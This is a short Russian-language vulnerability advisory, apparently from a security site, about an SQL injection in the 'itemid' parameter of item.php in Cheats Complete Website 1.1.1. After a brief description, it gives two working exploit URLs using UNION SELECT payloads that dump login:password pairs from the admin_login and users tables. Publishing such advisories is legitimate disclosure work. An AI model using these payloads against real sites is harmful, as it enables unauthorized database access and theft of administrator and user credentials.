Программа: Cheats Complete Website 1.1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «itemid» сценарием item.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

<!> Для получения информации об admin:

www.site.me/patch/item.php?itemid=-999999999+union+select+ concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*

<!> Для получения информации о пользователях:

www.site.me/patch/item.php?itemid=-999999999+union+select+
concat(login,0x3a,password),1,2,3,4,5+from+users/*



Оставить мнение